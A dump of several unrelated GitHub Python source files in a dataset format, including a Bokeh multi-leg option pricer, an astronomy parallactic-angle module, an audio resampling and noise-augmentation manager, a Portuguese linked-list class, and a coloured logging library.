vol, T, r)[0]\n unit_val_int = assets[asset_type][\"BS_analytical\"](S, K, vol, T_int, r)[0]\n th_greeks += Q*np.array(assets[asset_type][\"BS_analytical\"](S0, K, vol, T, r))\n\n if(T <= 0):\n unit_val = assets[asset_type][\"payoff\"](S, K)\n if(T_int <= 0):\n unit_val_int = assets[asset_type][\"payoff\"](S, K)\n\n current_value += Q*unit_val\n int_value += Q*unit_val_int\n maturity_value += Q*assets[asset_type][\"payoff\"](S, K)\n else:\n T_max = max([maturity_input[leg_nb].value for leg_nb in range(4)])\n monte_carlo_means = np.zeros_like(S)\n monte_carlo_std = np.zeros_like(S)\n monte_carlo_nb = np.zeros_like(S)\n\n for leg_nb in range(4):\n Q = qty_input[leg_nb].value\n if(leg_nb in leg_toggle.active and Q != 0):\n K = strike_input[leg_nb].value\n asset_type = type_select[leg_nb].value\n maturity_value += Q*assets[asset_type][\"payoff\"](S, K)\n\n for i, s_start in enumerate(S):\n if(not i % 10):\n print('Computing for s=', s_start)\n sim = np.zeros((1, 1))\n if((models[model_names[model_selection_input.active]]['resolution_method'].value == 'Monte-Carlo')):\n sim = Monte_Carlo(s_start, T_max, 1000*(1+2*int(abs(close_index-i) < 2)))\n else:\n sim = Adaptive_Monte_Carlo(s_start, T_max, 0.02, 1000*(1+2*int(abs(close_index-i) < 2)))\n\n for leg_nb in range(4):\n Q = qty_input[leg_nb].value\n if(leg_nb in leg_toggle.active and Q != 0):\n T = maturity_input[leg_nb].value\n K = strike_input[leg_nb].value\n asset_type = type_select[leg_nb].value\n\n T_int = max(T-T_delay, 0)\n res = assets[asset_type][\"payoff\"](sim[:, T], K)\n res_int = assets[asset_type][\"payoff\"](sim[:, T_int], K)\n\n unit_val = np.mean(res)\n monte_carlo_means[i] = np.mean(res)\n monte_carlo_std[i] = np.std(res)\n monte_carlo_nb[i] = len(res)\n\n unit_val_int = np.mean(res_int)\n\n if(T <= 0):\n unit_val = assets[asset_type][\"payoff\"](S, K)\n if(T_int <= 0):\n unit_val_int = assets[asset_type][\"payoff\"](S, K)\n\n current_value[i] += Q*unit_val\n int_value[i] += Q*unit_val_int\n\n # print(monte_carlo_means)\n # print(monte_carlo_std)\n # print(monte_carlo_nb)\n\n # GREEKS\n emp_greeks[0] = current_value[close_index]\n emp_greeks[1] = (current_value[close_index+1] - current_value[close_index-1])/(S[close_index+1]-S[close_index-1])\n emp_greeks[2] = (current_value[close_index+1] + current_value[close_index-1] - 2*current_value[close_index])/((S[close_index+1]-S[close_index])**2)\n emp_greeks[3] = (int_value[close_index]-current_value[close_index])/T_delay\n\n current_price = current_value[np.argmin(abs(S-S0))]\n curr_pnl = current_value-current_price\n matu_pnl = maturity_value-current_price\n int_pnl = int_value-current_price\n\n plot.x_range.start = 0.8*S0\n plot.x_range.end = 1.2*S0\n i_low, i_high = np.argmax(S > plot.x_range.start), np.argmin(S < plot.x_range.end)\n y_lowbound = min(np.min(current_value[i_low:i_high+1]), np.min(maturity_value[i_low:i_high+1]), np.min(int_value[i_low:i_high+1]))\n y_highbound = max(np.max(current_value[i_low:i_high+1]), np.max(maturity_value[i_low:i_high+1]), np.max(int_value[i_low:i_high+1]))\n if(y_highbound-y_lowbound > 0):\n plot.y_range.start = y_lowbound\n plot.y_range.end = y_highbound\n\n source.data = dict(x=S, curr=current_value, pnl_matu=maturity_value, pnl_int=int_value)\n display_source.data['th_value'] = np.round(th_greeks, 3)\n if(models[model_names[model_selection_input.active]]['resolution_method'].value != 'Analytical (recommended)'):\n display_source.data['th_value'] = ['N/A']*6\n display_source.data['emp_value'] = list(np.round(emp_greeks[:4], 3))+['Not computed']*2\n\nto_link = [curr_spot_input, int_delay_input]\nfor leg_nb in range(4):\n to_link += [type_select[leg_nb], qty_input[leg_nb], strike_input[leg_nb]]\nfor w in to_link:\n w.on_change('value', param_changed)\n\nleg_toggle.on_click(param_changed_mono)\nleg_toggle.on_click(update_UI_mono)\n\ninstant_recompute.on_click(update_UI_mono)\n\nask_recompute.on_click(recompute_asked)\n\nfor w in [int_delay_input]+[type_select[leg_nb] for leg_nb in range(4)]:\n w.on_change('value', update_UI)\n\n# Set up layouts and add to document\nleg_inputs = [column(qty_input[i], type_select[i], strike_input[i], maturity_input[i], sizing_mode=\"scale_both\") for i in range(4)]\ninputs = column(row(curr_spot_input, int_delay_input),\n column(leg_toggle, row(leg_inputs[0], leg_inputs[1], leg_inputs[2], leg_inputs[3])),\n row(ask_recompute, instant_recompute, recompute_delay),\n row(display_data_table), width=750)\n\ntab1 = Panel(child=row(inputs, plot), title='Overview')\n\nsource_underlying_example = ColumnDataSource(data=dict(T=[], S=[], sig=[]))\n\nexample_plot = figure(plot_height=400, plot_width=800, title=\"Underlying example path\", x_axis_label='Time', y_axis_label='Underlying price',\n tools=\"crosshair,save\",\n x_range=[0, 1], y_range=[90, 110], align='start')\n\nexample_plot.line('T', 'S', source=source_underlying_example, line_width=4, line_alpha=0.8, color=Spectral4[0])\n\nexample_vol_plot = figure(plot_height=250, plot_width=800, title=\"Underlying example volatility\", y_axis_label='Underlying volatility',\n tools=\"crosshair,save\",\n x_range=[0, 1], y_range=[0, 1], align='start')\n\nexample_vol_plot.line('T', 'sig', source=source_underlying_example, line_width=4, line_alpha=0.8, color=Spectral4[3])\n\nexample_plot.title.align = 'center'\nexample_plot.title.text_font_size = '20pt'\nexample_plot.xaxis.axis_label_text_font_size = \"20pt\"\nexample_plot.yaxis.axis_label_text_font_size = \"20pt\"\n\nexample_vol_plot.title.align = 'center'\nexample_vol_plot.title.text_font_size = '15pt'\nexample_vol_plot.yaxis.axis_label_text_font_size = \"15pt\"\n\nblocked_clear = False\n\n\ndef clear_display():\n global blocked_clear\n if(not blocked_clear):\n display_zone.text = ''\n\n\ndef clear_text_asked(attrname, old, new):\n clear_display()\n\n\ndef fit_from_file_asked(attrname, old, new):\n if(len(new)):\n fit_model_from_file()\n fit_from_file_button.value = ''\n fit_from_file_button.filename = ''\n\n\ndef fit_model_from_file():\n try:\n print('Reading file and parsing data...')\n data = base64.b64decode(fit_from_file_button.value)\n df = pd.read_csv(BytesIO(data), sep=',', parse_dates=True, infer_datetime_format=True)\n ic = min([i for i in range(len(df.columns)) if is_numeric_dtype(df.dtypes[i])])\n print(f\"First numerical column found is column #{ic} : {df.columns[ic]}\")\n index = df.iloc[:, ic].to_numpy()\n returns = index[1:]/index[:-1]\n dilated_log_returns = 100*np.log(returns)\n prms = []\n\n if(model_names[model_selection_input.active] == 'GARCH(1,1)'):\n model = arch_model(dilated_log_returns).fit(disp='off')\n display_zone.text = str(model.summary())\n prms = model.params.to_numpy()\n\n elif(model_names[model_selection_input.active] == 'GJR-GARCH(1,1)'):\n model = arch_model(dilated_log_returns, o=1).fit(disp='off')\n display_zone.text = str(model.summary())\n prms = model.params.to_numpy()\n prms[3], prms[4] = prms[4], prms[3]\n\n elif(model_names[model_selection_input.active] == 'Black-Scholes'):\n prms = [int(days_in_year_input.value)*np.mean(returns-1), np.sqrt(int(days_in_year_input.value))*np.std(returns)]\n display_zone.text = ''\n\n global blocked_recompute\n blocked_recompute = True\n\n for w, x in zip(models[model_names[model_selection_input.active]]['params_inputs'], prms):\n w.value = np.round(x, 6)\n\n blocked_recompute = False\n model_parameters_changed_mono('')\n curdoc().add_timeout_callback(clear_display, 15000)\n print(\"Done!\")\n\n except Exception as e:\n print(\"Model fiting critically failed:\"+str(e))\n\n\ndef model_parameters_changed_mono(new):\n redraw_example()\n param_changed_mono(new)\n\n\ndef model_parameters_changed(attrname, old, new):\n redraw_example()\n param_changed(attrname, old, new)\n\n\ndef redraw_example():\n # Generate the new curve\n N_points = 1000\n S0 = curr_spot_input.value\n\n T_max = max([maturity_input[leg_nb].value for leg_nb in range(4) if(leg_nb in leg_toggle.active)])\n Time = np.linspace(0, T_max, N_points+1)\n\n val, vol = models[model_names[model_selection_input.active]]['path']([x.value for x in models[model_names[model_selection_input.active]]['params_inputs']], S0, T_max, N_points)\n\n example_plot.x_range.start = 0\n example_plot.x_range.end = T_max\n example_plot.y_range.start = 0.99*np.min(val)\n example_plot.y_range.end = 1.01*np.max(val)\n\n example_vol_plot.x_range.start = 0\n example_vol_plot.x_range.end = T_max\n example_vol_plot.y_range.start = 0.99*np.min(vol)\n example_vol_plot.y_range.end = 1.01*np.max(vol)\n\n source_underlying_example.data = dict(T=Time, S=val, sig=vol)\n\ndays_in_year_input = Select(title=\"Days in year:\", options=['252', '365'], value='365', width=200)\ndays_in_year_input.on_change('value', model_parameters_changed)\n\nfor md in models:\n models[md]['params_inputs'] = []\n for nm, low_bound, high_bound, stepp, ini in models[md]['params']:\n models[md]['params_inputs'].append(Spinner(title=nm, low=low_bound, high=high_bound, step=stepp, value=ini, width=150))\n models[md]['params_inputs'][-1].on_change('value', model_parameters_changed)\n res_met = int(md == 'Black-Scholes')*['Analytical (recommended)']+['Monte-Carlo', 'Adaptive Monte-Carlo (experimental)']\n models[md]['resolution_method'] = Select(title=\"Resolution method:\", options=res_met, value=res_met[0], width=150)\n models[md]['resolution_method'].on_change('value', param_changed)\n\n\nmodel_selection_input = RadioButtonGroup(labels=model_names, active=0, width=600)\nmodel_selection_input.on_click(model_parameters_changed_mono)\n\nfit_desc = Div(text=\"\"\"

Fit model from file:

\"\"\", align='center')\nfit_from_file_button = FileInput(accept='.csv,.txt', align='center')\nfit_from_file_button.on_change('value', fit_from_file_asked)\n\ndisplay_zone = PreText(text=\"\"\"Default parameters are from CAC 40 returns\"\"\")\n\nfor w in [maturity_input[leg_nb] for leg_nb in range(4)]:\n w.on_change('value', model_parameters_changed)\n\ntab2 = Panel(child=row(column(days_in_year_input,\n model_selection_input,\n row(children=[column(children=[models[md]['resolution_method']]+models[md]['params_inputs']) for md in models]),\n row(fit_desc, fit_from_file_button, width=650),\n row(display_zone, width=650),\n width=650),\n column(example_plot, example_vol_plot)\n ), title='Underlying model')\n\ncurdoc().add_root(Tabs(tabs=[tab1, tab2]))\ncurdoc().title = \"Moulagator\"\nredraw_UI()\nredraw_example()\n","repo_name":"Come-B/multi_leg_pricer","sub_path":"PYTHON_PROJECT.py","file_name":"PYTHON_PROJECT.py","file_ext":"py","file_size_in_byte":25025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72154391527","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nimport math\n\n\ndef JD_to_LST(JDs, llong):\n \"\"\"Returns LST [frac. of day] using:\n JD - [iterable] - values of Julian data\n llong - local longitude [+/-degrees].\n \"\"\"\n\n LSTs = list()\n\n llong_h = llong / 15.\n\n for JD in list(JDs):\n\n D = JD - 2451545.0\n GMST = 18.697374558 + 24.06570982441908 * D\n GMST = GMST % 24\n\n if GMST < 0:\n GMST += 24.\n elif GMST >= 24.0:\n GMST -= 24.0\n\n LST = GMST + llong_h\n #convert to fraction of day\n LST = LST / 24.\n\n LSTs.append(LST)\n\n return LSTs\n\n\ndef LST_to_HA(LSTs, RA):\n \"\"\"\n RA [degrees] - right ascenction\n LST [fr. of days] - local sidireal time\n Returns Hour Angle [rads]\n \"\"\"\n\n HAs = list()\n\n RA_rad = RA * math.pi / 180.\n\n for LST in list(LSTs):\n HA = 2. * math.pi * LST - RA_rad\n HAs.append(HA)\n\n return HAs\n\n\ndef PA(JDs, ra, dec, latitude, longitude):\n \"\"\"Function returns parallactic angles of source (ra, dec) observed at\n moments of Julian Date jds at geographic position (lat, llong) that is\n 'east' or 'west' of Greenwitch.\n Parameters:\n jds - [iterable] - set of Julian Dates,\n ra, dec - [float] - right assention & declination of source,\n llong, lat - [float] - geographical longitude and latitude of\n the observer.\n \"\"\"\n\n PAs = list()\n\n LSTs = JD_to_LST(JDs, longitude)\n\n HAs = LST_to_HA(LSTs, ra)\n\n for HA in list(HAs):\n\n PA = math.atan2(math.sin(HA), (math.tan(latitude) * math.cos(dec) -\\\n math.sin(dec) * math.cos(HA)))\n PAs.append(PA)\n\n return PAs\n","repo_name":"akutkin/SACA","sub_path":"vlbi_errors/PA.py","file_name":"PA.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22464667409","text":"from pydub import AudioSegment\nimport os\nfrom packages.LibrosaManager import LibrosaManager \nimport soundfile as sf\nimport librosa\nimport numpy as np\nimport random \nimport shutil\n\nclass AudioManager:\n\n def __init__(self) -> None:\n pass\n\n def convertAudioDirectory(self,\n audio_dir: str,\n input_format: str,\n output_format: str = '.wav',\n output_dir: str = None,\n delete_original: bool = False,\n bitrate: str = None,\n codec: str = None):\n\n for file in os.listdir(audio_dir):\n\n if input_format in file:\n self.convertAudioFileTypes(os.path.join(audio_dir, file), output_format=output_format, \n delete_original=delete_original, output_dir=output_dir,\n bitrate=bitrate, codec=codec)\n \n\n\n def convertAudioFileTypes(self, audio_path: str,\n output_format: str = '.wav',\n delete_original: bool = False,\n output_dir: str = None,\n output_file_name: str = None,\n bitrate: str = None,\n codec: str = None):\n \n assert output_format in ['.wav', '.mp4'], f'{output_format} is an invalid output format. Please enter types: (.wav, .mp4).' ## SB_COMMENT: maybe i am misunderstanding the error flow but htis doesnt get triggered with incorrect input string\n \n try:\n import_audio = AudioSegment.from_file(audio_path)\n\n if isinstance(output_file_name, type(None)):\n output_file_name = os.path.basename(audio_path)\n output_file_name = output_file_name.replace(os.path.splitext(output_file_name)[1], output_format)\n\n if not output_dir:\n output_dir = os.path.dirname(audio_path)\n\n import_audio.export(os.path.join(output_dir, output_file_name),\n format=output_format.replace('.', ''),\n codec=codec,\n bitrate=bitrate)\n\n if delete_original:\n os.remove(audio_path)\n \n except Exception as e:\n print(f'Failed to Convert Audio File: {audio_path}')\n print('Error: ', e)\n\n def resampleAudioDirectory(self, input_directory: str, output_directory: str, target_sample_rate: int, replace_existing: bool = False):\n \n for file in os.listdir(input_directory):\n \n if os.path.splitext(file)[1] not in ['.wav', '.mp4', '.WAV']:\n continue\n \n if not replace_existing:\n if os.path.isfile(os.path.join(output_directory, file)):\n continue\n \n try:\n librosa_manager = LibrosaManager(os.path.join(input_directory, file))\n resampled_audio = librosa_manager.resample(target_sample_rate) ## SB_Comment - see librosa manager re: resampling\n sf.write(os.path.join(output_directory, file), resampled_audio, target_sample_rate, subtype='PCM_24')\n except Exception as e:\n print(f'Failed to Resample: {file}')\n print(f'Error Msg: {e}')\n print()\n \n \n def addNoiseWithSnr(self, audio_path: str, snr_range: list = [10, 80]):\n \n audio, sr = librosa.load(audio_path) ## SB_comment - again, loading without native. Does thi mean that even the resampled files are being re-resampled to 22100?!\n \n audio_power = np.mean(audio ** 2)\n \n noise_snr = random.randint(snr_range[0], snr_range[1])\n noise_power = audio_power / (10 ** (noise_snr / 10))\n noise = np.random.normal(scale=np.sqrt(noise_power)*100, size=len(audio))\n\n noisy_audio = audio + noise\n\n return noisy_audio, noise_snr, sr\n\n\n def launderAudioDirectory(self, input_dir: str, output_dir: str, noise_type: str = 'random_gaussian', replace_existing: bool = False, transcode_prob=0.5, noise_prob=0.5):\n\n full_launder_details = []\n\n # Loop through files \n for file in os.listdir(input_dir):\n\n #[is_transcode, bitrate, is_noise, snr]\n file_launder_details = [os.path.join(input_dir, file), 0, None, 0, None]\n\n\n #if not replace_existing:\n # if os.path.isfile(os.path.join(output_dir, file)):\n # continue\n\n try:\n # Assign random conditions\n # conditions = {'gaussian_noise':np.NaN, 'transcode':np.NaN, 'gaussian_noise_and_transcode':np.NaN, 'neither':np.NaN}\n # random_bools = [0 for item in range(len(conditions)-1)] + [1]\n # assignments = random.sample(random_bools, 4)\n\n # for i in range(len(conditions)):\n # key = list(conditions.keys())[i]\n # conditions[key] = assignments[i]\n\n # Apply random conditions\n # if 'gaussian_noise' in :\n # noisy_audio = add_noise_with_snr(audio_path=file)\n\n # sf.write(os.path.join(output_directory, file), noisy_audio, target_sample_rate, subtype='PCM_24')\n\n is_transcode = np.random.rand() <= transcode_prob\n is_noise = np.random.rand() <= noise_prob\n\n bitrate_options = ['64k', '127k', '196k']\n\n\n if is_transcode:\n\n bitrate = random.choice(bitrate_options)\n\n file_launder_details[1] = 1\n file_launder_details[2] = bitrate\n\n self.convertAudioFileTypes(os.path.join(input_dir, file), output_dir=output_dir,\n output_format='.mp4', delete_original=False, bitrate=bitrate,\n codec='aac'\n )\n\n self.convertAudioFileTypes(os.path.join(output_dir, file.replace('wav', 'mp4')), output_format='.wav', delete_original=True)\n\n else:\n # if no transcode is necessary, just move the file to the new directory\n shutil.copy(os.path.join(input_dir, file), os.path.join(output_dir, file))\n\n if is_noise:\n\n noisy_audio, noise_snr, sr = self.addNoiseWithSnr(os.path.join(output_dir, file))\n\n file_launder_details[3] = 1\n file_launder_details[4] = noise_snr\n\n\n #sf.write(os.path.join(output_dir, file), noisy_audio, target_sample_rate, subtype='PCM_24')\n sf.write(os.path.join(output_dir, file), noisy_audio, sr) # SB_Comment - again, care with SR\n\n full_launder_details.append(file_launder_details)\n\n except Exception as e:\n print(f'Failed to add noise: {file}')\n print(f'Error Msg: {e}')\n print()\n\n return full_launder_details\n","repo_name":"romitbarua/MultiModalDeepFake","sub_path":"packages/AudioManager.py","file_name":"AudioManager.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"23261351369","text":"#!/usr/bin/env python\n\n\"\"\"Log messages in different colours according to level.\nOutput can use 256 colours if the fabulous library is found.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport logging\nimport logging.handlers\nfrom datetime import datetime\nfrom importlib import import_module\n\ntry:\n\timport fabulous\n\t# Why not try these for more terminal tricks.\n\t# python -m fabulous.demo\n\t# python -m fabulous.image \n\t# python -m fabulous.text --skew=4 --shadow hello kitty\n\nexcept ImportError:\n\tfabulous = None\n\n# theme (module name from this directory) to use if not specified in init_log()\nDEFAULT_THEME = os.environ.get('THEMELOG_THEME', 'base16')\n\n# if THEMELOG_LIGHT is truthy we select a _light theme more suitable for terminals with\n# light backgrounds\nDEFAULT_LIGHT = False # os.environ.get('THEMELOG_LIGHT', '').zfill(1)[0].lower() in ('t', '1')\n\n# minimum log level to include\nDEFAULT_LOG_LEVEL = 'DEBUG'\n\n# date format\nDEFAULT_DATEFMT = '%Y-%m-%d %H:%M:%S'\n\n# message format used when a blank theme is selected or fabulous is not installed\n# or stderr is being redirected\nDEFAULT_MESSAGEFMT = '{r.asctime} {r.module} {r.levelname} {r.msg}'\n\n# default number of days to hold logfiles for if rotating logfiles are configured\nDEFAULT_ROTATING_COUNT = 90\n\n# allow environment variable to switch on debug startup messages\nDEFAULT_DEBUG_LOG = os.environ.get('THEMELOG_DEBUG', '').zfill(1)[0].lower() in ('t', '1')\n\n# list available themes\nSHOW_THEMES = os.environ.get('THEMELOG_SHOW_THEMES', '').zfill(1)[0].lower() in ('t', '1')\n\n\ndef get_messagefmt(theme, light=False, debug_log=False):\n\t\"\"\"Read messagefmt from modules in this directory.\n\tIf `light` is true we look for a module named theme_light.py instead of theme.py.\n\t\"\"\"\n\tif fabulous is None or theme is None or not sys.stdout.isatty():\n\t\t# no terminal colours\n\t\tif debug_log:\n\t\t\tif fabulous is None:\n\t\t\t\tprint('Disabling colour output because fabulous library not found')\n\n\t\t\telif theme is None:\n\t\t\t\tprint('Disabling colour output because chosen theme is null')\n\n\t\t\telse:\n\t\t\t\tprint('Disabling colour output because stdout is not a terminal')\n\n\t\treturn {None: DEFAULT_MESSAGEFMT}\n\n\telif theme == '8bit' or os.environ.get('INSIDE_EMACS') is not None:\n\t\tif debug_log:\n\t\t\tif theme == '8bit':\n\t\t\t\tprint('8-bit colour theme selected')\n\n\t\t\telse:\n\t\t\t\tprint('8-bit colour theme forced as we are inside emacs ansi-term')\n\n\t\t# an 8-bit colour theme. Forced if we are running inside an emacs ansi-term shell.\n\t\tfrom themelog.themes import eightbit\n\t\treturn eightbit.messagefmt\n\n\telse:\n\t\tif debug_log:\n\t\t\tprint('Selected theme {t}'.format(t=theme))\n\n\t\tmod = None\n\t\tbase = 'themelog.themes.{theme}'.format(theme=theme)\n\t\tif light:\n\t\t\tif debug_log:\n\t\t\t\tprint('Seeking light theme')\n\t\t\ttry:\n\t\t\t\tmod = import_module(base + '_light')\n\n\t\t\texcept ImportError:\n\t\t\t\tpass\n\n\t\tif mod is None:\n\t\t\ttry:\n\t\t\t\tmod = import_module(base)\n\n\t\t\texcept ImportError:\n\t\t\t\tprint('Cannot load module {base}'.format(base=base))\n\t\t\t\tshow_available_themes()\n\t\t\t\tprint('Disabling all color output')\n\t\t\t\treturn {None: DEFAULT_MESSAGEFMT}\n\n\t\treturn mod.messagefmt\n\n\nclass Formatter(object):\n\t\"\"\"Variation on logging.Formatter which uses different formats depending\n\ton the log level.\n\t\"\"\"\n\tdef __init__(self, messagefmt, datefmt):\n\t\tself.messagefmt = messagefmt\n\t\tself.datefmt = datefmt\n\n\tdef format(self, record):\n\t\t\"\"\"The following contents are available in the message:\n\n\t\t\tcreated 1374882991.29\n\t\t\texc_info None\n\t\t\texc_text None\n\t\t\tfilename env.py\n\t\t\tfuncName main\n\t\t\tlevelname DEBUG\n\t\t\tlevelno 10\n\t\t\tlineno 32\n\t\t\tmodule env\n\t\t\tmsecs 291.249990463\n\t\t\tmsg Hello I am debug message\n\t\t\tname root\n\t\t\tpathname /localhome/mje/Work/chart/chart/tools/env.py\n\t\t\tprocess 25037\n\t\t\tprocessName MainProcess\n\t\t\trelativeCreated 50.5659580231\n\t\t\tthread 139741536122624\n\t\t\tthreadName MainThread\n\n\t\tLevels:\n\t\t\tdebug\n\t\t\tinfo\n\t\t\twarning\n\t\t\terror\n\t\t\tcritical\n\n\t\t\"\"\"\n\t\t# expand the message part if needed\n\t\tif '%s' in record.msg:\n\t\t\trecord.msg = record.msg % record.args\n\n\t\t# look up the format string for this level\n\t\tmessagefmt = self.messagefmt.get(record.levelname)\n\t\tif messagefmt is None:\n\t\t\t# use None if we have nothing configured for this level\n\t\t\tmessagefmt = self.messagefmt[None]\n\n\t\t# format the message timestamp\n\t\trecord.asctime = datetime.fromtimestamp(\n\t\t\trecord.created).strftime(self.datefmt)\n\n\t\t# return the final assembled string\n\t\treturn messagefmt.format(r=record)\n\n\ndef show_available_themes():\n\t\"\"\"Display list of available themes to console.\n\tDo not use logging here because the logging system will not be ready yet.\n\t\"\"\"\n\tprint('Available themes:')\n\tfor filename in os.listdir(os.path.join(os.path.dirname(__file__), 'themes')):\n\t\tif filename == '__init__.py':\n\t\t\tcontinue\n\n\t\tprint(' {theme}'.format(theme=os.path.splitext(filename)[0]))\n\n\ndef init_log(theme=DEFAULT_THEME,\n\t\t\t light=None,\n\t\t\t level=DEFAULT_LOG_LEVEL,\n\t\t\t logfile=None,\n\t\t\t rotating_logfile=None,\n\t\t\t rotating_logfile_count=DEFAULT_ROTATING_COUNT,\n\t\t\t stdout=False,\n\t\t\t tz=None,\n\t\t\t datefmt=DEFAULT_DATEFMT,\n\t\t\t debug_log=DEFAULT_DEBUG_LOG,\n\t\t\t show_themes=SHOW_THEMES):\n\t\"\"\"Configure and initialise logging.\n\n\tArgs:\n\t\t`theme` (str): Name of the theme (a module from this directory) to try to use.\n\t\t`light` (bool): Attempt to load a theme suitable for light coloured terminal backgrounds.\n\t\t`level` (str): Minimum message level.\n\t\t`logfile` (str): Write to single output log file instead of terminal.\n\t\t`rotating_logfile` (str): Write to daily rotating log files.\n\t\t`stdout` (bool): Write terminal log to stdout instead of stderr.\n\t\t`tz` (str or false): Set timezone for the process. If `tz` is False then use UTC.\n\t\t`datefmt` (str): Date format.\n\t\t`debug_log` (bool): Print trace messages showing how the logging is initialised.\n\t\t`show_themes` (bool): Print a list of available themes.\n\t\"\"\"\n\n\tif debug_log:\n\t\tprint('Init of log')\n\n\tif show_themes:\n\t\tshow_available_themes()\n\n\t# Set timezone\n\tif tz is not None:\n\t\tinit_tz(tz)\n\n\tif light is None:\n\t\tlight = DEFAULT_LIGHT\n\n\t# check for valid log level\n\tlevels = ('DEBUG', 'INFO', 'WARN', 'ERROR', 'CRITICAL')\n\tif level not in levels:\n\t\traise ValueError('level of {bad} not allowed, select from {good}'.format(\n\t\t\t\tbad=level, good=', '.join(levels)))\n\n\t# we configure the top level root logger\n\tlogger = logging.getLogger()\n\tlogger.setLevel(level)\n\n\tif logfile is not None:\n\t\t# single log file\n\n\t\tif debug_log:\n\t\t\tprint('Writing log file to {path}'.format(path=logfile))\n\n\t\tfilehandler = logging.FileHandler(logfile)\n\t\tfilehandler.setFormatter(Formatter({None: DEFAULT_MESSAGEFMT},\n\t\t\t\t\t\t\t\t\t\t datefmt))\n\t\tlogger.addHandler(filehandler)\n\n\telif rotating_logfile is not None:\n\t\t# rotating log file\n\n\t\tif debug_log:\n\t\t\tprint('Writing rotating log file to {path}'.format(rotating_logfile))\n\n\t\tfilehandler = logging.handlers.TimedRotatingFileHandler(\n\t\t\tfilename=rotating_logfile,\n\t\t\twhen='midnight',\n\t\t\tbackupCount=rotating_logfile_count,\n\t\t\tutc=tz is False)\n\t\tfilehandler.setFormatter(Formatter({None: DEFAULT_MESSAGEFMT},\n\t\t\t\t\t\t\t\t\t\t datefmt))\n\t\tlogger.addHandler(filehandler)\n\n\telse:\n\t\t# terminal\n\n\t\tif debug_log:\n\t\t\tprint('Logging to terminal')\n\n\t\tif stdout:\n\t\t\tstreamhandler = logging.StreamHandler(sys.stdout)\n\n\t\telse:\n\t\t\tstreamhandler = logging.StreamHandler(sys.stderr)\n\n\t\tstreamhandler.setFormatter(\n\t\t\tFormatter(get_messagefmt(theme, light, debug_log),\n\t\t\t\t\t datefmt))\n\t\tlogger.addHandler(streamhandler)\n\n\t# prevent doubling up of messages\n\tlogger.propagate = False\n\n\ndef init_tz(tz):\n\t\"\"\"Use UTC time zone for logging.\n\t\"\"\"\n\tif tz is False:\n\t\tos.environ['TZ'] = 'UTC' # required for scheduler and worker log timestamps\n\n\telse:\n\t\tos.environ['TZ'] = tz\n\n\ttime.tzset()\n","repo_name":"mjem/themelog","sub_path":"themelog/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70180284649","text":"from pokenode import PokeNode\n\n#Lista modificada para aceitar apenas itens do PokeNode\n\nclass List:\n\n def __init__(self):\n\n self.__head = None\n\n \n def add(self, *item):\n\n '''Adiciona itens no índice 0 da lista'''\n\n temp = PokeNode(*item)\n temp.set_next(self.__head)\n self.__head = temp\n\n\n def remove(self, item):\n\n ''' Remove a primeira ocorrência do item na lista.'''\n\n current = self.__head\n previous = None\n\n #A lista está vazia?\n if current == None:\n print(\"Não há itens nesta lista.\")\n #O item removido é o primeiro da lista\n elif current.get_data() == item:\n self.__head = current.get_next()\n #Item removido não é o primeiro elemento\n else:\n #Vá até ele\n while current.get_data() != item:\n previous, current = current, current.get_next()\n previous.set_next(current.get_next())\n\n def size(self):\n\n '''Retorna a quantidade de itens presentes na lista (length)'''\n\n count = 0\n current = self.__head\n while current != None:\n count += 1\n current = current.get_next()\n\n return count\n\n def search(self, item):\n\n '''Retorna True se a lista possuir o elemento'''\n\n current = self.__head\n while current != None:\n if current.get_data() != item:\n current = current.get_next()\n else:\n return True\n\n return False\n\n def is_empty(self):\n\n '''Verifica se a lista está vazia. Retorna True se verdadeiro.'''\n\n return self.__head == None\n\n def append(self, *item):\n\n '''Adiciona um item na última posição da lista'''\n\n current = self.__head\n temp = PokeNode(*item)\n #A lista está vazia\n if current == None:\n self.__head = temp\n #A lista não está vazia\n else:\n while current.get_next() != None:\n current = current.get_next()\n current.set_next(temp)\n \n\n def index(self, item):\n\n '''Retorna o índice do elemento na lista. Retorna -1 se a lista não possuí-lo'''\n\n count = 0\n current = self.__head\n try:\n while current.get_data() != item:\n current = current.get_next()\n count += 1\n return count\n except:\n return -1\n\n def insert(self, pos, *item):\n \n '''Adiciona um item no índice \"pos\"\n Se pos for >= o tamanho da lista, adiciona no fim'''\n\n current = self.__head\n previous = None\n temp = PokeNode(*item)\n count = 0\n\n #Lista vazia\n if self.is_empty():\n self.__head = temp\n #Demais casos\n else:\n try:\n #Pos 0\n if pos == 0:\n temp.set_next(current)\n self.__head = temp\n #Pos > 0 <= len\n else: \n #Verificar até o último índice da lista \n while count != pos:\n previous, current = current, current.get_next()\n count += 1\n temp.set_next(current)\n previous.set_next(temp)\n #Vai dar erro quando current for None, pois None.get_next(), e pos > len\n except:\n temp.set_next(current)\n previous.set_next(temp)\n \n #TODO\n # def pop(self, pos = None):\n \n # '''Remove o último item da lista.\n # Pode receber um índice específico.'''\n\n # current = self.__head\n # previous = None\n # popped = None\n\n # try:\n # \n # except:\n # return \"A lista está vazia\"\n\n # return popped\n \n def __str__(self):\n \n '''Printa a lista tal qual uma lista em Python, []'''\n\n current = self.__head\n lista_string = \"[ \"\n\n #A lista está vazia?\n if self.is_empty():\n return lista_string + \"]\"\n #Adicionar itens da lista\n while current != None:\n if current.get_next() == None:\n return lista_string + \"{} ]\".format(str(current.get_data()))\n lista_string += \"{}, \".format(str(current.get_data()))\n current = current.get_next()\n ","repo_name":"Arushidesu/projeto-ed-pokemon","sub_path":"lista.py","file_name":"lista.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27375980742","text":"\"\"\"Summarise network-hazard intersections\n\nPurpose\n-------\n\nCollect network-hazard intersection attributes\n - Combine with boundary Polygons to collect network-hazard-boundary intersection attributes\n - Write final results to an Excel sheet\n\nInput data 